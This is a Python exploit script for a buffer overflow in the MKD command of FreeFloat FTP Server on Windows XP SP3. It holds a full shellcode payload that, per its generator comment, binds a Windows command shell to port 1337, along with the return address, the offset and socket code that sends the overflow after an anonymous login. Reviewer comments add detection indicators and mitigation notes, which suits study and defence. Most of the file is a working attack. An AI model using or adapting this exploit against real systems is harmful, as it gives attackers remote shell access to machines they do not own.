#!/usr/bin/python
#---------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP, MKD Buffer Overflow vulnerability #
# OS: Windows XP Pro SP3 #
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
# #
# Author: Oraclox (Brandon Ceja) #
#---------------------------------------------------------------------------------#
import sys
import socket
#---------------------------------------------------------------------------------#
# shellcode: msfvenom -p windows/shell_bind_tcp LPORT=1337 -b "\x00\x0A\x0D" -f c #
#---------------------------------------------------------------------------------#
# listener: nc -nv 192.168.211.128 1337 #
#---------------------------------------------------------------------------------#
# Opaque payload bytes, kept verbatim. According to the generator command in
# the comment above, this is an msfvenom windows/shell_bind_tcp payload bound
# to TCP port 1337 and encoded to avoid the bytes 0x00, 0x0A and 0x0D (which
# would terminate or split an FTP command line). The bytes were not decoded
# as part of this review, so treat that description as the author's claim.
# Defender note: a bind-shell payload of this kind would show up on the target
# as a new listening socket (here port 1337) owned by the FTP server process,
# which is a useful host-level and network-level indicator.
shellcode = (
"\xdb\xd1\xd9\x74\x24\xf4\x58\x2b\xc9\xba\xcf\x17\x71\x19\xb1"
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x9f\x04\x93\xec\xe3\xc3\xd1"
"\x0f\x1b\x14\xb6\x86\xfe\x25\xf6\xfd\x8b\x16\xc6\x76\xd9\x9a"
"\xad\xdb\xc9\x29\xc3\xf3\xfe\x9a\x6e\x22\x31\x1a\xc2\x16\x50"
"\x98\x19\x4b\xb2\xa1\xd1\x9e\xb3\xe6\x0c\x52\xe1\xbf\x5b\xc1"
"\x15\xcb\x16\xda\x9e\x87\xb7\x5a\x43\x5f\xb9\x4b\xd2\xeb\xe0"
"\x4b\xd5\x38\x99\xc5\xcd\x5d\xa4\x9c\x66\x95\x52\x1f\xae\xe7"
"\x9b\x8c\x8f\xc7\x69\xcc\xc8\xe0\x91\xbb\x20\x13\x2f\xbc\xf7"
"\x69\xeb\x49\xe3\xca\x78\xe9\xcf\xeb\xad\x6c\x84\xe0\x1a\xfa"
"\xc2\xe4\x9d\x2f\x79\x10\x15\xce\xad\x90\x6d\xf5\x69\xf8\x36"
"\x94\x28\xa4\x99\xa9\x2a\x07\x45\x0c\x21\xaa\x92\x3d\x68\xa3"
"\x57\x0c\x92\x33\xf0\x07\xe1\x01\x5f\xbc\x6d\x2a\x28\x1a\x6a"
"\x4d\x03\xda\xe4\xb0\xac\x1b\x2d\x77\xf8\x4b\x45\x5e\x81\x07"
"\x95\x5f\x54\xbd\x9d\xc6\x07\xa0\x60\xb8\xf7\x64\xca\x51\x12"
"\x6b\x35\x41\x1d\xa1\x5e\xea\xe0\x4a\x65\xd2\x6d\xac\x0f\x34"
"\x38\x66\xa7\xf6\x1f\xbf\x50\x08\x4a\x97\xf6\x41\x9c\x20\xf9"
"\x51\x8a\x06\x6d\xda\xd9\x92\x8c\xdd\xf7\xb2\xd9\x4a\x8d\x52"
"\xa8\xeb\x92\x7e\x5a\x8f\x01\xe5\x9a\xc6\x39\xb2\xcd\x8f\x8c"
"\xcb\x9b\x3d\xb6\x65\xb9\xbf\x2e\x4d\x79\x64\x93\x50\x80\xe9"
"\xaf\x76\x92\x37\x2f\x33\xc6\xe7\x66\xed\xb0\x41\xd1\x5f\x6a"
"\x18\x8e\x09\xfa\xdd\xfc\x89\x7c\xe2\x28\x7c\x60\x53\x85\x39"
"\x9f\x5c\x41\xce\xd8\x80\xf1\x31\x33\x01\x01\x78\x19\x20\x8a"
"\x25\xc8\x70\xd7\xd5\x27\xb6\xee\x55\xcd\x47\x15\x45\xa4\x42"
"\x51\xc1\x55\x3f\xca\xa4\x59\xec\xeb\xec"
)
#---------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
# 0x7c86467b: jmp esp | kernel32.dll #
#---------------------------------------------------------------------------------#
# Builds one oversized FTP MKD argument and sends it after an anonymous login.
# The script is written for Python 2 (plain str objects are passed to send()).
#
# Defender notes:
#  - The MKD argument is 1000 bytes long (247 + 4 + 749) and is mostly
#    non-printable. An FTP command argument of that size and content is
#    anomalous, so a length/charset check on FTP commands at an IDS or proxy
#    would flag it.
#  - The 4-byte value is a fixed address inside a system DLL, so the layout
#    depends on the exact OS build named in the header (Windows XP Pro SP3).
#    NOTE(review): address randomisation (ASLR) and non-executable stack (DEP)
#    on later Windows versions should break this layout as written; confirm
#    for the deployment in question.
#  - The root cause is the server copying the MKD argument without a bounds
#    check. NOTE(review): no fixed version is named in this file, so removing
#    or replacing the FTP server looks like the practical mitigation.

# 20 bytes of 0x90 (x86 NOP) placed in front of the payload bytes.
buffer = "\x90" * 20 + shellcode
# 247 filler bytes (presumably the distance to the saved return address —
# confirm against a debugger trace), then 0x7c86467b in little-endian byte
# order (the "jmp esp" address listed in the comment above), then the
# NOP-prefixed payload, then "C" padding so that everything after the address
# totals 749 bytes. If buffer were longer than 749 bytes, the multiplier would
# be negative and the padding would simply be empty.
evil = "A" * 247 + "\x7b\x46\x86\x7c" + buffer + "C" * (749 - len(buffer))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target host and FTP control port are hard-coded. socket.connect() returns
# None, so `connect` is always None and is never used.
connect = s.connect(('192.168.211.128', 21))
# Every recv() result below is discarded: the server banner and the reply
# codes are never checked, so a failed login is not detected.
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
# The overlong MKD (make directory) argument is the input that triggers the
# overflow named in the file header.
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# NOTE(review): `s.close` without parentheses only references the method; the
# socket is not closed explicitly and is released when the interpreter exits.
s.close